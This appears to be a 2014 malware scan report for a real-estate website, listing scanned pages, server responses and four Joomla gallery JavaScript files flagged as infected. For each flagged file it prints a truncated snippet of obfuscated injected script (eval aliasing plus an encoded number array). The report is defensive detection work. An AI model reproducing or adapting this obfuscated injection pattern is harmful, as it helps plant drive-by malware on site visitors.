Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gmimmobili.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gmimmobili.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:06:26 GMT Location: http://www.gmimmobili.com/ Server: Apache Content-Length: 234 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gmimmobili.com/ | 200 OK Content-Length: 13999 Content-Type: text/html | clean |
http://www.gmimmobili.com/components/com_expose/expose/swf/AC_RunActiveContent.js | 200 OK Content-Length: 5508 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=226;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,113,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,26,27,23,24,111,40,110,105,91,25,55,27,30,96,109,110,1 Antivirus reports:
| ||
http://www.gmimmobili.com/components/com_expose/expose/shadowbox/build/js/lib/yui-utilities.js | 200 OK Content-Length: 45505 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=226;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,113,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,26,27,23,24,111,40,110,105,91,25,55,27,30,96,109,110,1 Antivirus reports:
| ||
http://www.gmimmobili.com/components/com_expose/expose/shadowbox/build/js/adapter/shadowbox-yui.js | 200 OK Content-Length: 3164 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=226;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,113,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,26,27,23,24,111,40,110,105,91,25,55,27,30,96,109,110,1 Antivirus reports:
| ||
http://www.gmimmobili.com/components/com_expose/expose/shadowbox/build/js/shadowbox.js | 200 OK Content-Length: 33215 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=226;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,113,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,26,27,23,24,111,40,110,105,91,25,55,27,30,96,109,110,1 Antivirus reports:
| ||
http://gmimmobili.com/index.php?option=com_content&view=article&id=8&Itemid=8 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:06:34 GMT Location: http://www.gmimmobili.com/index.php?option=com_content&view=article&id=8&Itemid=8 Server: Apache Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=article&id=8&itemid=8 | 200 OK Content-Length: 10324 Content-Type: text/html | clean |
http://www.gmimmobili.com/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/javascript | clean |
http://gmimmobili.com/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=17 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 17:06:35 GMT Location: http://www.gmimmobili.com/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=17 Server: Apache Content-Length: 319 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=category&layout=blog&id=3&itemid=17 | 200 OK Content-Length: 48493 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=article&id=8&Itemid=8 | 200 OK Content-Length: 10409 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=17 | 200 OK Content-Length: 48478 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=article&id=7&Itemid=9 | 200 OK Content-Length: 9755 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=article&id=9&Itemid=10 | 200 OK Content-Length: 9965 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=article&id=14&Itemid=19 | 200 OK Content-Length: 17790 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_content&view=article&id=12&Itemid=18 | 200 OK Content-Length: 11024 Content-Type: text/html | clean |
http://www.gmimmobili.com/index.php?option=com_wrapper&view=wrapper&Itemid=11 | 200 OK Content-Length: 8436 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gmimmobili.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:06:26 GMT
Location: http://www.gmimmobili.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
GET / HTTP/1.1
Host: gmimmobili.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:06:26 GMT
Location: http://www.gmimmobili.com/
Server: Apache
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
...234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gmimmobili.com
Referer: http://www.google.com/search?q=gmimmobili.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gmimmobili.com
Referer: http://www.google.com/search?q=gmimmobili.com
Result:
The result is similar to the first query. There are no suspicious redirects found.